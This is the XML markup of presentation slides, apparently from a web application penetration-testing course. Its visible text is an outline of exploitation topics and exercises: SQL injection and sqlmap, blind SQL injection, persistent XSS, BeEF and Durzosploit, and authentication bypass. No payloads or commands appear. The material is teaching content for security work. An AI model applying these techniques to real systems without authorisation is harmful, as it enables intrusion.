              <a:gd name="T18" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T19" fmla="*/ 0 h 15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17"/>
              <a:gd name="T31" fmla="*/ 0 h 1547"/>
              <a:gd name="T32" fmla="*/ 5017 w 5017"/>
              <a:gd name="T33" fmla="*/ 1547 h 15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17" h="1547">
                <a:moveTo>
                  <a:pt x="134" y="470"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="740"/>
                  <a:pt x="0" y="1010"/>
                  <a:pt x="19" y="1180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="1350"/>
                  <a:pt x="104" y="1441"/>
                  <a:pt x="250" y="1488"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="396" y="1535"/>
                  <a:pt x="588" y="1547"/>
                  <a:pt x="893" y="1459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1198" y="1371"/>
                  <a:pt x="1768" y="1074"/>
                  <a:pt x="2083" y="960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2398" y="846"/>
                  <a:pt x="2550" y="795"/>
                  <a:pt x="2784" y="777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3018" y="759"/>
                  <a:pt x="3168" y="800"/>
                  <a:pt x="3485" y="854"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3802" y="908"/>
                  <a:pt x="4436" y="1083"/>
                  <a:pt x="4685" y="1104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4934" y="1125"/>
                  <a:pt x="5017" y="1163"/>
                  <a:pt x="4982" y="979"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4947" y="795"/>
                  <a:pt x="4710" y="397"/>
                  <a:pt x="4474" y="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3105" name="Picture 8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7813" y="1563688"/>
            <a:ext cx="1920875" cy="216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3106" name="AutoShape 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2649538" y="2046288"/>
            <a:ext cx="731837" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 60026"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>5          </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3107" name="AutoShape 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2643188" y="1643063"/>
            <a:ext cx="731837" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 60026"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>7          </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19075" y="122420"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="952500" y="4235450"/>
            <a:ext cx="1036638" cy="15240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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="144388" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="8458200" cy="5087938"/>
            <a:chOff x="215" y="441"/>
            <a:chExt cx="5195" cy="3724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14439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441"/>
              <a:ext cx="5195" cy="3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144391" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2641" y="1764"/>
              <a:ext cx="634" cy="394"/>
            </a:xfrm>
            <a:prstGeom prst="leftArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 40228"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC00"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>       </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144392" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3178" y="2638"/>
              <a:ext cx="634" cy="394"/>
            </a:xfrm>
            <a:prstGeom prst="leftArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 40228"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC00"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>       </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144393" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2265" y="3281"/>
              <a:ext cx="634" cy="394"/>
            </a:xfrm>
            <a:prstGeom prst="leftArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 40228"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC00"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>       </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="4267200"/>
            <a:ext cx="1036638" cy="15240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065618"/>
            <a:ext cx="8458200" cy="43434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BeEF Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 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45414"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1041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="2135067"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Pen-Testing &amp; Scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="152400"/>
            <a:ext cx="3429000" cy="6324600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exploitation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Bypass Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Authentication Bypass</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Authentication Bypass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Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> File Handling with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> OS Interaction with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sqlmap Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Port Scanning with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> File Injection with SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Prepared Injection Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Prepared Files Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Blind SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Persistent XSS Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Advanced XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Durzosploit Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSS Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
